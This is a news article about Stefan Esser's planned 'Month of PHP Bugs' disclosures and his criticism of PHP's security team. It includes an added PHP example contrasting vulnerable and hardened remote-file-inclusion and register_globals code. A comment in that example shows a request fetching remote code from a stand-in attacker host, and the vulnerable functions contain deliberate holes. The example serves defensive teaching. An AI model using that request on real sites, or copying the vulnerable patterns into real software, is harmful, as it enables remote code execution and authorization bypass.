Stefan Esser's frustrations with the PHP Security Response Team have boiled over into plans for a "Month of PHP Bugs" project scheduled for March 2007.
Esser, widely regarded as an authority on PHP security issues, plans to make daily disclosures on buffer overflows, double free vulnerabilities and trivial bypass bugs in PHP's protection features as part of a wider goal "to make people and especially the PHP developers aware that bugs in PHP exist."
In an interview with SecurityFocus, the German researcher did not hide his disdain for the way PHP security issues are handled by the open-source group that maintains the project. "PHP has a very bad reputation when it comes to security, which is mostly caused by all the advisories about security holes in PHP applications," he declared, arguing that the situation is inflamed by the PHP Group's insistence on blaming programmers for insecure coding practices.
"Remote File Inclusions, vulnerabilities due to register_globals or other problems within the PHP engine (e.g. zend_hash_del_key_or_index bug) are fully to blame on the PHP language. Unfortunately this kind of thinking is not appreciated by the PHP developers and they continue to claim that PHP is not worse than other languages, and that only badly written PHP applications are the problem. The Month of PHP bugs will show however that a lot of bugs in PHP's own source code exist," Esser added.
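As an added illustration of the two application-level flaw classes Esser names above (this is not code from the article, from Esser, or from the PHP project), the following PHP shows a vulnerable and a hardened form of each. It assumes a PHP 4 / early PHP 5 configuration with register_globals and allow_url_fopen enabled; the host name and the password-check helper in it are hypothetical.

```php
<?php
// Added example, not from the article or from PHP's own source.
// Assumes a PHP 4 / early-5 era configuration with register_globals=On and
// allow_url_fopen=On (from PHP 5.2 a remote include additionally requires
// allow_url_include=On).

// 1. Remote File Inclusion: an attacker-controlled string reaches include().
//    A request such as /page.php?page=http://attacker.example/shell.txt?
//    (attacker.example is a hypothetical host) fetches and executes remote
//    code; the trailing "?" turns the appended ".php" into a query string.
function render_page_vulnerable() {
    include($_GET['page'] . '.php');
}

// Hardened: map the untrusted parameter onto a fixed allow-list and build the
// path from a constant base directory, so user input never becomes a path.
function render_page_hardened() {
    $pages = array('home' => 'home.php', 'about' => 'about.php');
    $key = isset($_GET['page']) ? $_GET['page'] : 'home';
    if (!isset($pages[$key])) {
        header('HTTP/1.0 404 Not Found');
        return;
    }
    include(dirname(__FILE__) . '/pages/' . $pages[$key]);
}

// 2. register_globals: with register_globals=On, request parameters are
//    turned into PHP variables before the script runs, so a variable the
//    code never initialises can be pre-seeded by the client:
//    /admin.php?authorized=1
function is_admin_vulnerable() {
    if (check_admin_password()) {
        $authorized = true;
    }
    // Already true if ?authorized=1 was sent, whatever the password check said.
    return !empty($authorized);
}

// Hardened: initialise every variable before use and read request data only
// through the superglobals, so register_globals cannot inject state.
function is_admin_hardened() {
    $authorized = false;
    if (check_admin_password()) {
        $authorized = true;
    }
    return $authorized;
}

// Hypothetical helper so the file runs stand-alone. A real application would
// compare against a stored password hash rather than a configured constant.
define('ADMIN_PASSWORD', 'change-me');
function check_admin_password() {
    return isset($_POST['password']) && $_POST['password'] === ADMIN_PASSWORD;
}
```

The two hardened functions also hold on later PHP versions, where register_globals was removed (5.4) and remote includes are off by default, which is why initialising variables and allow-listing include targets remained the standard advice for code that still had to run on older installations.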
Esser's flaw disclosure project will only release information on holes within the code shipped with the default distribution of PHP. "That means we will not disclose holes in extensions that only exist in PECL, while we are sure that those contain vulnerabilities, too. Most of the holes were previously disclosed to the vendor, but not all," he explained.
Because of the volume of PHP bugs stockpiled, he said, more than one vulnerability will be disclosed on some days in March.
"As a vulnerability reporter you feel kinda puzzled how people among the PHP Security Response Team can claim in public that they do not know about any security vulnerability in PHP, when you disclosed about 20 holes to them in the two weeks before. At this point you stop bothering whether anyone considers the disclosure of unreported vulnerabilities unethical. Additionally a few of the reported bugs have been known for years among the PHP developers and will most probably never be fixed," he argued.
The issue of PHP security has been on the front burner lately, driven mostly by a dramatic rise in exploitable flaws in PHP-based Web applications.